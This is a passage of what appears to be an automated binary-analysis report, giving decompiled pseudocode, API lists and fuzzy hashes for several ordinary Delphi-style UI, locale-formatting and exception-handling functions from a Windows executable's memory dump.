+ 0x84)))) + 0xe8))( &_v113, _v12); OffsetRect( &_v113, _v64, _v60); if(E00403B24( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) { _t238 = E00457F80(_v16, _t250, _t298, 0xffc7, _t309) + 5; _v113.left = _v113.left - _t238; _v113.right = _v113.right - _t238; } E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &_v48); _t218 = *_t250; *((intOrPtr*)(_t218 + 0x64)) = _v140; *((intOrPtr*)(_t218 + 0x68)) = _v136; E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)), &_v140, &(_v48.right)); _t222 = *_t250; *((intOrPtr*)(_t222 + 0x6c)) = _v140; *((intOrPtr*)(_t222 + 0x70)) = _v136; E0043AB90( *((intOrPtr*)( *_t250 + 0x84)), _v52); _t115 = *_t250 + 0x84; // 0xff7ce8c3 *((intOrPtr*)( *((intOrPtr*)( *_t115)) + 0xe4))(_v12); E0045539C(_v16); _t231 = _v24; if(_v24 <= 0) { E00457B58( *_t250, 1, _v20); } else { E00457B58( *_t250, 0, _t231); } L26: _pop(_t269); *[fs:eax] = _t269; _push(E004583BE); E00404760( &_v148, 2); _t271 = *0x44c7e8; // 0x44c7ec return E0040529C( &_v72, _t271); } } } } 0x00458031 0x00458039 0x0045803a 0x0045803b 0x0045803c 0x0045803e 0x00458044 0x0045804f 0x00458050 0x00458051 0x00458057 0x0045805d 0x00458062 0x00458067 0x00458068 0x0045806d 0x00458070 0x00458075 0x0045807b 0x00458087 0x00458370 0x00458370 0x00458373 0x00458375 0x00458386 0x00458377 0x0045837d 0x0045837d 0x00000000 0x004580a6 0x004580b0 0x004580b5 0x004580ba 0x00000000 0x004580c0 0x004580c5 0x004580cb 0x004580d1 0x004580d9 0x004580e6 0x004580ee 0x004580f9 0x00458101 0x00458104 0x00458105 0x00458106 0x00458107 0x00458112 0x00458117 0x0045811c 0x00458124 0x00458127 0x00458129 0x00458139 0x0045813e 0x00458144 0x00458149 0x0045814b 0x0045814d 0x00458154 0x00458161 0x00458161 0x00458154 0x0045812b 0x00458132 0x00458132 0x00458178 0x0045818b 0x00458196 0x0045819f 0x004581ad 0x004581be 0x004581cc 0x004581d6 0x004581d9 0x004581de 0x004581e3 0x004581ef 0x004581fd 0x00458205 0x00458217 0x00458225 0x00458225 0x0045822f 0x00458239 0x0045823d 0x0045823d 0x0045823d 0x0045823f 0x00458241 0x0045824a 0x00000000 0x00458250 0x00458250 0x00458254 0x00000000 0x00000000 0x0045825e 0x00458277 0x00458292 0x004582a4 0x004582bc 0x004582c8 0x004582cb 0x004582ce 0x004582ce 0x004582df 0x004582e4 0x004582ec 0x004582f5 0x00458306 0x0045830b 0x00458313 0x0045831c 0x0045832a 0x00458335 0x00458343 0x00458349 0x0045834e 0x00458353 0x00458369 0x00458355 0x0045835b 0x0045835b 0x0045838b 0x0045838d 0x00458390 0x00458393 0x004583a3 0x004583ab 0x004583b6 0x004583b6 0x0045824a 0x004580ba

APIs

Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7 Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02 Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3 Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9 ClientToScreen.USER32(?,?), ref: 00458161 OffsetRect.USER32(?,?,?), ref: 00458178 OffsetRect.USER32(?,?,?), ref: 004582A4 Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72

Strings

4jC , xrefs: 0045813E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows String ID: 4jC API String ID: 2591747986-2900625241 Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029 Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E0043B7E4(void* __eax, intOrPtr __ecx, intOrPtr __edx, signed char _a4) { intOrPtr _v8; signed char _v9; intOrPtr _v16; struct tagPOINT _v32; intOrPtr _v36; long _v40; char _v56; void* __edi; struct HWND__* _t57; void* _t63; signed char _t84; struct HWND__* _t108; void* _t110; intOrPtr _t134; intOrPtr _t137; void* _t141; struct HWND__* _t143; struct HWND__* _t147; void* _t152; void* _t154; intOrPtr _t155; _t152 = _t154; _t155 = _t154 + 0xffffffcc; _v8 = __ecx; _t137 = __edx; _t110 = __eax; if(__edx == 0 || __edx == 0xffffffff) { _t57 = *(_t110 + 0x94); if(_t57 == 0 || *((char*)(_t57 + 0x1db)) == 0 || *((intOrPtr*)(_t57 + 0x1b0)) == 0) { E0041938C( *((intOrPtr*)(_t110 + 0x40)), &_v40, *((intOrPtr*)(_t110 + 0x44))); _v32.x = _v40; _v32.y = _v36; _t143 = *(_t110 + 0x30); __eflags = _t143; if(_t143 != 0) { E0043A4AC(_t143, &_v40, &_v32); _v32.x = _v40; _v32.y = _v36; } } else { *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x1b0)))) + 0x14))(); MapWindowPoints(E004423F8( *(_t110 + 0x94)), 0, &_v32, "true"); } _t63 = E0043A9A8(_t110); E004193DC(_v32.x, E0043A9BC(_t110), _v32.y, &_v56, _t63); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _v9 = E0043B9C4(_t110, &_v32); goto L20; } else { E0043BCD0(__eax); __eflags = *(_t110 + 0x94); if(__eflags == 0) { L12: _t84 = 1; } else { _t108 = E00403B24( *(_t110 + 0x94), __eflags); __eflags = _t108; if(_t108 != 0) { goto L12; } else { _t84 = 0; } } _v9 = _t84; __eflags = _v9; if(_v9 == 0) { L20: return _v9 & 0x000000ff; } else { _v16 = E00437D90(1, _t137); _push(_t152); _push(0x43b9b0); _push( *[fs:edx]); *[fs:edx] = _t155; _t87 = *(_t110 + 0x94); __eflags = *(_t110 + 0x94); if( *(_t110 + 0x94) == 0) { _t147 = 0; __eflags = 0; } else { _t147 = E004423F8(_t87); } E0043A33C(_t110, &_v32); __eflags = _t147; if(__eflags != 0) { MapWindowPoints(_t147, 0, &_v32, "true"); } *((intOrPtr*)(_v16 + 8)) = _t137; *((char*)(_v16 + 0x5c)) = _a4 & 0x000000ff; *((intOrPtr*)(_v16 + 0x60)) = _v8; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t141 = _t137; MapWindowPoints(0, E004423F8(_t141), &_v32, 1); _push(_v32.y); E00403B24(_t141, __eflags); __eflags = 0; _pop(_t134); *[fs:eax] = _t134; _push(0x43b9b7); return E00403928(_v16); } } } 0x0043b7e5 0x0043b7e7 0x0043b7ed 0x0043b7f0 0x0043b7f2 0x0043b7f6 0x0043b801 0x0043b809 0x0043b851 0x0043b859 0x0043b85f 0x0043b862 0x0043b865 0x0043b867 0x0043b871 0x0043b879 0x0043b87f 0x0043b87f 0x0043b81d 0x0043b82a 0x0043b841 0x0043b841 0x0043b884 0x0043b89d 0x0043b8a8 0x0043b8a9 0x0043b8aa 0x0043b8ab 0x0043b8b6 0x00000000 0x0043b8be 0x0043b8c0 0x0043b8c5 0x0043b8cc 0x0043b8e9 0x0043b8e9 0x0043b8ce 0x0043b8dc 0x0043b8e1 0x0043b8e3 0x00000000 0x0043b8e5 0x0043b8e5 0x0043b8e5 0x0043b8e3 0x0043b8eb 0x0043b8ee 0x0043b8f2 0x0043b9b7 0x0043b9c1 0x0043b8f8 0x0043b906 0x0043b90b 0x0043b90c 0x0043b911 0x0043b914 0x0043b917 0x0043b91d 0x0043b91f 0x0043b92a 0x0043b92a 0x0043b921 0x0043b926 0x0043b926 0x0043b931 0x0043b936 0x0043b938 0x0043b943 0x0043b943 0x0043b94b 0x0043b955 0x0043b95e 0x0043b96b 0x0043b96c 0x0043b96d 0x0043b96e 0x0043b96f 0x0043b980 0x0043b988 0x0043b995 0x0043b99a 0x0043b99c 0x0043b99f 0x0043b9a2 0x0043b9af 0x0043b9af 0x0043b8f2

APIs

MapWindowPoints.USER32 ref: 0043B841 MapWindowPoints.USER32 ref: 0043B943 MapWindowPoints.USER32 ref: 0043B980

Strings

QC , xrefs: 0043B8FC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow String ID: QC API String ID: 4123100037-2823088291 Opcode ID: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b Instruction ID: 0050ec7504fc6389c387471725f03a9a37d0cdeba202718832385931f1dd160c Opcode Fuzzy Hash: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b Instruction Fuzzy Hash: A5517071E002099BCB10DF69C881BEEB7F9EF49304F15506AEE14AB382C7789D05CBA5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E0040BC90(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _v8; char _v12; void* _v16; char _v20; char _v24; intOrPtr _t50; intOrPtr _t52; intOrPtr _t54; intOrPtr _t56; intOrPtr _t80; void* _t81; intOrPtr _t82; intOrPtr _t88; intOrPtr _t96; intOrPtr _t115; signed int _t123; signed int _t125; void* _t127; intOrPtr _t130; void* _t131; _t131 = __eflags; _push(0); _push(0); _push(0); _push(0); _push(0); _t125 = __edx; _t127 = __eax; _push(_t130); _push(0x40be60); _push( *[fs:eax]); *[fs:eax] = _t130; _t96 = 1; E0040473C(__edx); E0040B954(GetThreadLocale(), 0x40be78, 0x1009, &_v12); if(E00408B44(0x40be78, 1, _t131) + 0xfffffffd - 3 < 0) { while(1) { __eflags = _t96 - E004049FC(_t127); if(__eflags > 0) { goto L29; } asm("bt [0x461808], eax"); if(__eflags >= 0) { _t50 = E00409184(_t127 + _t96 - 1, 2, 0x40be7c); __eflags = _t50; if(_t50 != 0) { _t52 = E00409184(_t127 + _t96 - 1, 4, 0x40be8c); __eflags = _t52; if(_t52 != 0) { _t54 = E00409184(_t127 + _t96 - 1, 2, 0x40bea4); __eflags = _t54; if(_t54 != 0) { _t56 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x59; __eflags = _t56; if(_t56 == 0) { L25: E00404A08(_t125, 0x40bebc); } else { __eflags = _t56 != 0x20; if(_t56 != 0x20) { E00404924(); E00404A08(_t125, _v24); } else { goto L25; } } } else { E00404A08(_t125, 0x40beb0); _t96 = _t96 + 1; } } else { E00404A08(_t125, 0x40be9c); _t96 = _t96 + 3; } } else { E00404A08(_t125, 0x40be88); _t96 = _t96 + 1; } _t96 = _t96 + 1; __eflags = _t96; } else { _v8 = E0040CD80(_t127, _t96); E00404C60(_t127, _v8, _t96, &_v20); E00404A08(_t125, _v20); _t96 = _t96 + _v8; } } } else { _t80 = *0x4658cc; // 0x9 _t81 = _t80 - 4; if(_t81 == 0 || _t81 + 0xfffffff3 - 2 < 0) { _t82 = 1; } else { _t82 = 0; } if(_t82 == 0) { E00404790(_t125, _t127); } else { while(_t96 <= E004049FC(_t127)) { _t88 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x47; __eflags = _t88; if(_t88 != 0) { __eflags = _t88 != 0x20; if(_t88 != 0x20) { _t123 = *(_t127 + _t96 - 1) & 0x000000ff; _push(ds); asm("invalid"); _t8 = _t125 + _t125 * 8 - 0xbaa7401; *_t8 = *((intOrPtr*)(_t125 + _t125 * 8 - 0xbaa7401)) + 0x40be78; __eflags = *_t8; E00404A08(_t125, _t123); } } _t96 = _t96 + 1; __eflags = _t96; } } } L29: _pop(_t115); *[fs:eax] = _t115; _push(E0040BE67); return E00404760( &_v24, 4); } 0x0040bc90 0x0040bc95 0x0040bc96 0x0040bc97 0x0040bc98 0x0040bc99 0x0040bc9d 0x0040bc9f 0x0040bca3 0x0040bca4 0x0040bca9 0x0040bcac 0x0040bcaf 0x0040bcb6 0x0040bcce 0x0040bce6 0x0040be36 0x0040be3d 0x0040be3f 0x00000000 0x00000000 0x0040bd55 0x0040bd5c 0x0040bd9a 0x0040bd9f 0x0040bda1 0x0040bdc3 0x0040bdc8 0x0040bdca 0x0040bdeb 0x0040bdf0 0x0040bdf2 0x0040be08 0x0040be08 0x0040be0a 0x0040be10 0x0040be17 0x0040be0c 0x0040be0c 0x0040be0e 0x0040be26 0x0040be30 0x00000000 0x00000000 0x00000000 0x0040be0e 0x0040bdf4 0x0040bdfb 0x0040be00 0x0040be00 0x0040bdcc 0x0040bdd3 0x0040bdd8 0x0040bdd8 0x0040bda3 0x0040bdaa 0x0040bdaf 0x0040bdaf 0x0040be35 0x0040be35 0x0040bd5e 0x0040bd67 0x0040bd75 0x0040bd7f 0x0040bd84 0x0040bd84 0x0040bd5c 0x0040bcec 0x0040bcec 0x0040bcf1 0x0040bcf4 0x0040bd02 0x0040bcfe 0x0040bcfe 0x0040bcfe 0x0040bd06 0x0040bd43 0x0040bd08 0x0040bd2f 0x0040bd0f 0x0040bd0f 0x0040bd11 0x0040bd13 0x0040bd15 0x0040bd1a 0x0040bd1d 0x0040bd1e 0x0040bd20 0x0040bd20 0x0040bd20 0x0040bd29 0x0040bd29 0x0040bd15 0x0040bd2e 0x0040bd2e 0x0040bd2e 0x0040bd3a 0x0040bd06 0x0040be45 0x0040be47 0x0040be4a 0x0040be4d 0x0040be5f

APIs

GetThreadLocale.KERNEL32(?,00000000,0040BE60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BCBF Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972

Strings

yyyy , xrefs: 0040BDB5 eeee , xrefs: 0040BDCE ggg , xrefs: 0040BDA5

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread String ID: eeee$ggg$yyyy API String ID: 4232894706-1253427255 Opcode ID: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de Instruction ID: e06779fda62c0aa1c2fe6e63d9f97ef423efd52b2f0bde73b2610bed017219b3 Opcode Fuzzy Hash: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de Instruction Fuzzy Hash: 0341D2B03041454BC711AA7AC8866BFF2E6DF95304B64443BAA51B73C6DB3CAD0296ED

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E004389EC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) { intOrPtr _v8; intOrPtr _v12; struct tagPOINT _v20; intOrPtr _v24; char _v28; char _v36; void* __edi; void* __ebp; intOrPtr _t54; intOrPtr _t60; intOrPtr _t65; intOrPtr _t71; intOrPtr _t74; void* _t88; intOrPtr _t105; intOrPtr _t115; intOrPtr _t116; intOrPtr _t120; intOrPtr _t123; intOrPtr _t124; intOrPtr _t129; void* _t133; intOrPtr _t134; void* _t137; _t137 = __fp0; _v8 = __ecx; _t88 = __edx; _t124 = __eax; *0x466510 = __eax; _push(_t133); _push(0x438b91); _push( *[fs:edx]); *[fs:edx] = _t134; _v12 = 0; *0x466518 = 0; _t135 = *((char*)(__eax + 0x8f)); if( *((char*)(__eax + 0x8f)) != 0) { E00403B24(__eax, __eflags); __eflags = *0x466510; if( *0x466510 != 0) { __eflags = _v12; if(_v12 == 0) { _v12 = E00437D90(1, _t124); *0x466518 = 1; } _t128 = *((intOrPtr*)(_v12 + 0x40)); _t105 = *0x4369e8; // 0x436a34 _t54 = E00403AB4( *((intOrPtr*)(_v12 + 0x40)), _t105); __eflags = _t54; if(_t54 == 0) { _t129 = *((intOrPtr*)(_v12 + 0x40)); __eflags = *((intOrPtr*)(_t129 + 0x30)); if( *((intOrPtr*)(_t129 + 0x30)) != 0) { L14: __eflags = 0; E0041938C(0, &_v36, 0); E0043A4AC(_t129, &_v28, &_v36); _t60 = _v12; *((intOrPtr*)(_t60 + 0x4c)) = _v28; *((intOrPtr*)(_t60 + 0x50)) = _v24; L15: __eflags = *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)); E0041938C( *(_v12 + 0x4c) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)), &_v28, *((intOrPtr*)(_v12 + 0x50)) + *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x4c))); _t65 = _v12; *((intOrPtr*)(_t65 + 0x54)) = _v28; *((intOrPtr*)(_t65 + 0x58)) = _v24; goto L16; } _t116 = *0x4369e8; // 0x436a34 _t71 = E00403AB4(_t129, _t116); __eflags = _t71; if(_t71 != 0) { goto L14; } GetCursorPos( &_v20); _t74 = _v12; *(_t74 + 0x4c) = _v20.x; *((intOrPtr*)(_t74 + 0x50)) = _v20.y; goto L15; } else { GetWindowRect(E004423F8(_t128), _v12 + 0x4c); L16: asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); L17: E0043887C(_v12, _v8, _t88, _t133, _t137); _pop(_t115); *[fs:eax] = _t115; return 0; } } _pop(_t120); *[fs:eax] = _t120; return 0; } E00403B24(__eax, _t135); if( *0x466510 != 0) { __eflags = _v12; if(_v12 == 0) { _v12 = E00437C80(_t124, 1); *0x466518 = 1; } goto L17; } _pop(_t123); *[fs:eax] = _t123; return 0; } 0x004389ec 0x004389f5 0x004389f8 0x004389fa 0x004389fc 0x00438a04 0x00438a05 0x00438a0a 0x00438a0d 0x00438a12 0x00438a15 0x00438a1c 0x00438a23 0x00438a79 0x00438a7e 0x00438a85 0x00438a94 0x00438a98 0x00438aa8 0x00438aab 0x00438aab 0x00438ab5 0x00438aba 0x00438ac0 0x00438ac5 0x00438ac7 0x00438ae5 0x00438ae8 0x00438aec 0x00438b19 0x00438b1e 0x00438b20 0x00438b2d 0x00438b32 0x00438b38 0x00438b3e 0x00438b41 0x00438b53 0x00438b59 0x00438b5e 0x00438b64 0x00438b6a 0x00000000 0x00438b6a 0x00438af0 0x00438af6 0x00438afb 0x00438afd 0x00000000 0x00000000 0x00438b03 0x00438b08 0x00438b0e 0x00438b14 0x00000000 0x00438ac9 0x00438ad8 0x00438b6d 0x00438b76 0x00438b77 0x00438b78 0x00438b79 0x00438b7a 0x00438b82 0x00438b89 0x00438b8c 0x00000000 0x00438b8c 0x00438ac7 0x00438a89 0x00438a8c 0x00000000 0x00438a8c 0x00438a2e 0x00438a3a 0x00438a49 0x00438a4d 0x00438a61 0x00438a64 0x00438a64 0x00000000 0x00438a4d 0x00438a3e 0x00438a41 0x00000000

Strings

4jC , xrefs: 00438ABA, 00438AF0 XQC , xrefs: 00438A57

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: 4jC$XQC API String ID: 0-1995860932 Opcode ID: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0 Instruction ID: 261b67947a93c7365b213fc49c75792a3b9849106cec410a1886ea52049641a3 Opcode Fuzzy Hash: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0 Instruction Fuzzy Hash: E4518F70A047099FCB00DF59D841A9EFBB5FF88318F2190AAF800A7351D779A985CB89

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

E0043887C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) { intOrPtr _v16; intOrPtr _t24; intOrPtr _t26; intOrPtr _t28; intOrPtr* _t32; intOrPtr _t35; intOrPtr _t37; struct HWND__* _t38; intOrPtr _t39; intOrPtr* _t41; intOrPtr _t45; intOrPtr _t49; intOrPtr* _t53; long _t58; intOrPtr _t59; intOrPtr _t60; intOrPtr* _t65; intOrPtr _t66; intOrPtr _t70; intOrPtr* _t77; void* _t79; intOrPtr* _t80; long long _t87; _t87 = __fp0; _t80 = _t79 + 0xfffffff8; _t70 = __ecx; _t45 = __edx; _t77 = __eax; *0x466514 = __eax; _t24 = *0x466514; // 0x0 *((intOrPtr*)(_t24 + 8)) = 0; GetCursorPos(0x466520); _t26 = *0x466514; // 0x0 _t58 = 0x466520->x; // 0x0 *(_t26 + 0x10) = _t58; _t59 = *0x466524; // 0x0 *((intOrPtr*)(_t26 + 0x14)) = _t59; *0x466528 = GetCursor(); _t28 = *0x466514; // 0x0 *0x46651c = E00437A5C(_t28); *0x46652c = _t70; _t60 = *0x43519c; // 0x4351e8 if(E00403AB4(_t77, _t60) == 0) { __eflags = _t45; if(__eflags == 0) { *0x466530 = 0; } else { *0x466530 = 1; } } else { _t65 = _t77; _t4 = _t65 + 0x4c; // 0x4c _t41 = _t4; _t49 = *_t41; if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) { __eflags = 0; *((intOrPtr*)(_t65 + 0x28)) = 0; *((intOrPtr*)(_t65 + 0x2c)) = 0; } else { *_t80 = *((intOrPtr*)(_t65 + 0x10)) - _t49; asm("fild dword [esp]"); _v16 = *((intOrPtr*)(_t41 + 8)) - *_t41; asm("fild dword [esp+0x4]"); asm("fdivp st1, st0"); *((long long*)(_t65 + 0x28)) = __fp0; asm("wait"); } _t66 = *((intOrPtr*)(_t41 + 4)); if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) { __eflags = 0; *((intOrPtr*)(_t77 + 0x30)) = 0; *((intOrPtr*)(_t77 + 0x34)) = 0; } else { _t53 = _t77; *_t80 = *((intOrPtr*)(_t53 + 0x14)) - _t66; asm("fild dword [esp]"); _v16 = *((intOrPtr*)(_t41 + 0xc)) - *((intOrPtr*)(_t41 + 4)); asm("fild dword [esp+0x4]"); asm("fdivp st1, st0"); *((long long*)(_t53 + 0x30)) = _t87; asm("wait"); } if(_t45 == 0) { *0x466530 = 0; } else { *0x466530 = 2; *((intOrPtr*)( *_t77 + 0x30))(); } } _t32 = *0x466514; // 0x0 *0x466534 = *((intOrPtr*)( *_t32 + 8))(); _t85 = *0x466534; if( *0x466534 != 0) { _t37 = *0x466524; // 0x0 _t38 = GetDesktopWindow(); _t39 = *0x466534; // 0x0 E00443F74(_t39, _t38, _t85, _t37); } _t35 = E004038F8(1); *0x46653c = _t35; if( *0x466530 != 0) { _t35 = E00438594(0x466520, 1); } return _t35; } 0x0043887c 0x0043887f 0x00438882 0x00438884 0x00438886 0x00438888 0x0043888e 0x00438895 0x0043889d 0x004388a2 0x004388a7 0x004388ad 0x004388b0 0x004388b6 0x004388be 0x004388c3 0x004388cd 0x004388d2 0x004388da 0x004388e7 0x00438979 0x0043897b 0x00438986 0x0043897d 0x0043897d 0x0043897d 0x004388ed 0x004388ed 0x004388ef 0x004388ef 0x004388f5 0x004388fb 0x0043891d 0x0043891f 0x00438922 0x004388fd 0x00438902 0x00438905 0x0043890d 0x00438911 0x00438915 0x00438917 0x0043891a 0x0043891a 0x00438928 0x0043892f 0x00438954 0x00438956 0x00438959 0x00438931 0x00438931 0x00438938 0x0043893b 0x00438944 0x00438948 0x0043894c 0x0043894e 0x00438951 0x00438951 0x0043895e 0x00438970 0x00438960 0x00438960 0x0043896b 0x0043896b 0x0043895e 0x0043898d 0x00438997 0x0043899c 0x004389a3 0x004389a5 0x004389ab 0x004389b8 0x004389bd 0x004389bd 0x004389c9 0x004389ce 0x004389da 0x004389e1 0x004389e1 0x004389eb

APIs

GetCursorPos.USER32(00466520), ref: 0043889D GetCursor.USER32(00466520), ref: 004388B9 Part of subcall function 00437A5C: SetCapture.USER32(00000000,?,004388CD,00466520), ref: 00437A6B GetDesktopWindow.USER32 ref: 004389AB

Strings

QC , xrefs: 004388DA

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow String ID: QC API String ID: 669539147-2823088291 Opcode ID: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09 Instruction ID: ec58099d30e1c5017fec0aa898c8ab184d5e574ebc14b3c512b5b419d34dbb6a Opcode Fuzzy Hash: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09 Instruction Fuzzy Hash: 74415EB16052009FC304DF2DF985625BBE1BF88304B16956EE48A9B369EB75D841CF8A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0040C574(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) { char _v8; struct _MEMORY_BASIC_INFORMATION _v36; char _v297; char _v304; intOrPtr _v308; char _v312; char _v316; char _v320; intOrPtr _v324; char _v328; void* _v332; char _v336; char _v340; char _v344; char _v348; intOrPtr _v352; char _v356; char _v360; char _v364; void* _v368; char _v372; intOrPtr _t52; intOrPtr _t60; intOrPtr _t82; intOrPtr _t86; intOrPtr _t89; intOrPtr _t101; void* _t108; intOrPtr _t110; void* _t113; _t108 = __edi; _v372 = 0; _v336 = 0; _v344 = 0; _v340 = 0; _v8 = 0; _push(_t113); _push(0x40c72f); _push( *[fs:eax]); *[fs:eax] = _t113 + 0xfffffe90; _t89 = *((intOrPtr*)(_a4 - 4)); if( *((intOrPtr*)(_t89 + 0x14)) != 0) { _t52 = *0x462dac; // 0x407654 E00406740(_t52, &_v8); } else { _t86 = *0x462f40; // 0x40764c E00406740(_t86, &_v8); } _t110 = *((intOrPtr*)(_t89 + 0x18)); VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c); if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) { _v368 = *(_t89 + 0xc); _v364 = 5; _v360 = _v8; _v356 = 0xb; _v352 = _t110; _v348 = 5; _t60 = *0x462db8; // 0x4075fc E00406740(_t60, &_v372); E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368); } else { _v332 = *(_t89 + 0xc); _v328 = 5; E004049AC( &_v340, 0x105, &_v297); E00408F20(_v340, &_v336); _v324 = _v336; _v320 = 0xb; _v316 = _v8; _v312 = 0xb; _v308 = _t110; _v304 = 5; _t82 = *0x462e34; // 0x407714 E00406740(_t82, &_v344); E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332); } _pop(_t101); *[fs:eax] = _t101; _push(E0040C736); E0040473C( &_v372); E00404760( &_v344, 3); return E0040473C( &_v8); } 0x0040c574 0x0040c581 0x0040c587 0x0040c58d 0x0040c593 0x0040c599 0x0040c59e 0x0040c59f 0x0040c5a4 0x0040c5a7 0x0040c5ad 0x0040c5b4 0x0040c5c8 0x0040c5cd 0x0040c5b6 0x0040c5b9 0x0040c5be 0x0040c5be 0x0040c5d2 0x0040c5df 0x0040c5eb 0x0040c6a7 0x0040c6ad 0x0040c6b7 0x0040c6bd 0x0040c6c4 0x0040c6ca 0x0040c6e0 0x0040c6e5 0x0040c6f7 0x0040c60e 0x0040c611 0x0040c617 0x0040c62f 0x0040c640 0x0040c64b 0x0040c651 0x0040c65b 0x0040c661 0x0040c668 0x0040c66e 0x0040c684 0x0040c689 0x0040c69b 0x0040c6a0 0x0040c700 0x0040c703 0x0040c706 0x0040c711 0x0040c721 0x0040c72e

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601 Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772

Strings

Lv@ , xrefs: 0040C5B9 Tv@ , xrefs: 0040C5C8

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

